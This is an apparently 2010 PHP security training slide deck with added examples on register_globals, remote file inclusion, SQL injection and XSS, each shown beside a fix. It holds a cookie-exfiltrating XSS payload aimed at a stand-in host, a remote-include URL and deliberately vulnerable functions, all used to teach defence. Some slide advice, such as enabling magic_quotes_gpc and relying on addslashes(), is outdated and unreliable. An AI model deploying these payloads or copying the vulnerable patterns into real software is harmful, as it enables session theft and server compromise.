PHP Security Tech Talk
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
• Importance of PHP Security
• Concerns of PHP Security
1. Input Validation
2. Register Globals
3. Code Injection
4. SQL injection
5. Cross-site Scripting (XSS)
• Protect the server from crashing
• Prevent malicious users from gaining root access
• Protect customer data
• All user input is unreliable and can't be trusted
Solution:
• Validate all user input before use
• Validation on the client side is good for the user
• Validation on the server side is what provides security
• When register_globals is set to On, uninitialized variables can be injected via user input
• Example:

<?php
if (authenticate_user()) {
    $authenticated = true;
}
// - - - - -
if (!$authenticated) {
    die("Authentication required");
}
?>

If $authenticated is set to 1 via GET (http://ffs.com/admin.php?authenticated=1), the check passes even though authenticate_user() never succeeded.
• Set register_globals to Off in php.ini (disabled by default in versions >= 4.1.0)
• Alternative to register_globals: the superglobals
• $_GET – data from GET requests
• $_POST – POST request data
• $_COOKIE – cookie information
• $_FILES – uploaded file data
• $_SERVER – server data
• $_ENV – environment variables
• $_REQUEST – mix of GET, POST, COOKIE
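The register_globals bypass and its fix, as an added example that is not from the slides. Because register_globals is an ini setting, the vulnerable function simulates it with extract() over a constructed request array; the hardened function initializes the flag and reads input only from the superglobal-style array.

```php
<?php
// Added example (not from the slides): register_globals pitfall and its fix.
// With register_globals=On, admin.php?authenticated=1 creates $authenticated
// before the script runs, so an uninitialised variable becomes attacker-controlled.

// Vulnerable style: the flag is only assigned on success, never initialised.
// extract() stands in for register_globals and imports every request key
// as a local variable (it could overwrite $credentials_ok too).
function check_access_vulnerable(array $request, bool $credentials_ok): bool
{
    extract($request);                 // may define $authenticated from the URL
    if ($credentials_ok) {
        $authenticated = true;
    }
    return !empty($authenticated);     // attacker-supplied value is honoured
}

// Hardened style: initialise every variable and treat request data as data.
function check_access_safe(array $get, bool $credentials_ok): bool
{
    $authenticated = false;            // explicit initial value
    if ($credentials_ok) {
        $authenticated = true;
    }
    // $get['authenticated'] is untrusted input and is never used as the flag.
    return $authenticated;
}

// Constructed request: the URL carries ?authenticated=1 but the login failed.
$request = ['authenticated' => '1'];

// The vulnerable check lets the request through; the safe check denies it.
var_dump(check_access_vulnerable($request, false));
var_dump(check_access_safe($request, false));
```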
• Dynamic paths/files used in require/include statements
• Example:

<?php
include "{$_GET['path']}/script.php";
?>

If path is set to "http://www.hackers.com" via GET, the statement becomes:

<?php
include "http://www.hackers.com/script.php";
?>

• Avoid using dynamic paths
• Always use the full path, defined by constants
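A safe replacement for the dynamic include above, as an added example that is not from the slides. It assumes a pages/ directory under the script and an allowlist of page names (both made up); the request can only select a known file and can never supply a URL or a path of its own.

```php
<?php
// Added example (not from the slides): constant base path plus an allowlist
// instead of include "{$_GET['path']}/script.php".

define('APP_BASE', __DIR__ . '/pages');   // assumed layout: pages/<name>.php

// Permitted request values mapped to real files; anything else is rejected.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

// Returns the absolute file to include, or null if the request is not allowed.
function resolve_page(?string $requested): ?string
{
    if ($requested === null || !isset(ALLOWED_PAGES[$requested])) {
        return null;                      // not in the allowlist
    }
    $candidate = APP_BASE . '/' . ALLOWED_PAGES[$requested];

    // Defence in depth: realpath() resolves symlinks and "..", so even a
    // mistake in the allowlist cannot escape the base directory.
    $real = realpath($candidate);
    $base = realpath(APP_BASE);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Independently of this code, allow_url_include=Off in php.ini stops
// include/require from fetching remote URLs at all.
$page = resolve_page($_GET['page'] ?? null);
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```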
• Allows malicious SQL code to run on the server
• Can allow a malicious user to gain root access
• Removal of data
• Modification of existing values
• Denial of service
• MySQL prepared statements, using mysqli::prepare()
• Validate input data before sending it to the database
• addslashes(), mysql_real_escape_string()
• magic_quotes_gpc – set to On
• error_reporting – set to E_ALL
• display_errors – set to On in development, Off in production
• log_errors – set to On in production
• error_log – set to the desired location of the error log
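The injectable query beside its mysqli::prepare() form, as an added example that is not from the slides. It assumes a table users(id, name, email) and the connection details shown, all of which are made up.

```php
<?php
// Added example (not from the slides): string-built query vs prepared statement.

// Vulnerable: the request value is pasted into the SQL text, so a quote
// character inside it changes the structure of the query itself.
function find_user_vulnerable(mysqli $db, string $name): ?array
{
    $sql = "SELECT id, name, email FROM users WHERE name = '" . $name . "'";
    $result = $db->query($sql);
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// Hardened: the SQL text is fixed at prepare time and the value travels
// separately as a bound parameter, so it is never parsed as SQL.
function find_user_safe(mysqli $db, string $name): ?array
{
    $stmt = $db->prepare('SELECT id, name, email FROM users WHERE name = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $name);              // 's' = bind as a string
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();  // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

// Assumed connection details; set the charset so any escaping the driver
// does matches the connection encoding.
$db = new mysqli('localhost', 'app', 'secret', 'appdb');
$db->set_charset('utf8mb4');

// The request value is passed through unmodified; the binding does the work.
$user = find_user_safe($db, $_GET['name'] ?? '');
```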
• Injects HTML/script into a page, or passes a request to another site
• Session take-over
• Password theft
• User tracking by 3rd parties
• Example:

<script>document.location = "http://cookiehaker.com/xss.php?" + document.cookie</script>
• Server-side validation for all input data
• htmlspecialchars() – encodes ', ", <, >, &
• htmlentities() – converts all applicable characters to HTML entities
• strip_tags() – removes HTML and PHP tags
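Output encoding with the functions listed above, as an added example that is not from the slides. The input is a constructed comment string shaped like the cookie-stealing payload from the XSS example; note that htmlspecialchars() only encodes the single quote when ENT_QUOTES is passed.

```php
<?php
// Added example (not from the slides): encode untrusted data before echoing
// it into HTML, instead of trusting the input or trying to "clean" it.

// ENT_QUOTES makes the single quote encoded as well; without it a value
// placed inside a single-quoted attribute could still break out.
function html_escape(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// For a plain-text field where no markup is wanted at all: strip the tags,
// then still encode, because strip_tags() is a lossy filter, not an encoder.
function text_only(string $untrusted): string
{
    return html_escape(strip_tags($untrusted));
}

// Constructed untrusted input, in the shape of the payload from the slide.
$comment = '<script>document.location="http://cookiehaker.com/xss.php?"'
         . '+document.cookie</script>';

// Unsafe (kept as a comment): the browser would execute the script element.
// echo "<p>$comment</p>";

// Safe in element content: the same bytes are shown as text, not run.
echo '<p>' . html_escape($comment) . '</p>';

// Safe inside an attribute value, because both quote characters are encoded.
echo '<input name="comment" value="' . html_escape($comment) . '">';

// strip_tags() drops the <script> element but keeps the text between the
// tags, which is why the result is encoded again before output.
echo '<p>' . text_only($comment) . '</p>';

// htmlentities() behaves like htmlspecialchars() but also encodes every
// other character that has a named entity; use it when the page is not UTF-8.
echo '<p>' . htmlentities($comment, ENT_QUOTES, 'UTF-8') . '</p>';
```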
• XSS Me – https://addons.mozilla.org/en-US/firefox/addon/7598/
• Web Developer Tool
  • Firefox – https://addons.mozilla.org/en-US/firefox/addon/60/
  • IE – http://www.microsoft.com/downloads/details.aspx?FamilyID=E59C3964-672D-4511-BB3E-2D5E1DB91038
• Firebug – https://addons.mozilla.org/en-US/firefox/addon/1843/